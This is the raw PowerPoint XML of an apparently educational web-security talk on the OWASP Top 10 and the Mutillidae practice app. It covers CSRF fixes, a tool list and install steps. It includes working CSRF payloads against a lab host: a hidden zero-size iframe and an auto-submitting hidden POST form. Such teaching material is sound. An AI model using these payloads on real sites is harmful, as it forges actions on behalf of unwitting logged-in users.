              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>target.hak/mutillidae/index.php?page=add-to-your-blog.php&amp;input_from_form=hi%20there%20monkeyboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"" style="width:0px; height:0px; border: 0px"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Can’t use the GET method?   Try something like:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt; &lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>csrfform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" method="post" action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>target.hak/mutillidae/index.php?page=add-to-your-blog.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;input type='hidden' name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>input_from_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>value="Test of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>an auto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>submitted form."&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>document.csrfform.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>()&lt;/script&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF Flaws Found On Major Websites, Including a Bank </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://it.slashdot.org/article.pl?sid=08/09/30/0136219</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF Home Router Fun</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF in Gmail</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Do not use GET requests (URLs) for sensitive data or to perform value transactions. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>see next point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> POST alone is insufficient protection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Consider adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Captchas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and extra sessions values as hidden form elements. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="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Projects Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deliberately Insecure Web Applications For Learning Web App Security  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Useful tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>collections/libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SamuraiWTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://samurai.inguardians.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>OWASP Live CD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>BackTrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.remote-exploit.org/backtrack.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>ESAPI (OWASP Enterprise Security API)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="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Events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free ISSA classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ISSA Meeting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://issa-kentuckiana.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Louisville </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Infosec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.louisvilleinfosec.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Phreaknic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Notacon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Outerz0ne</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://phreaknic.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://notacon.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.outerz0ne.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The 2010 list includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A1: Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A2: Cross-Site Scripting (XSS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A3: Broken Authentication and Session Management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A4: Insecure Direct Object References </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A5: Cross-Site Request Forgery (CSRF) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A6: Security Misconfiguration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A7: Insecure Cryptographic Storage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A8: Failure to Restrict URL Access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A9: Insufficient Transport Layer Protection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Redirects and Forwards </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1295400"/>
            <a:ext cx="8305800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A teaching tool for illustrating the OWASP 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Written in PHP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Meant to be simpler than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple to exploit, just to get the concept across</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy to reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Includes a “Tips” function to help the student</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Samurai WTF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Live CD meant to be a “Web Testing Framework”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Made by some guys at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Inguardians</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Kevin Johnson</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Justin Searle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Frank DiMaggio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you want a more general network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backtrack 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.backtrack-linux.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3798274065"/>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Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for the lazy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
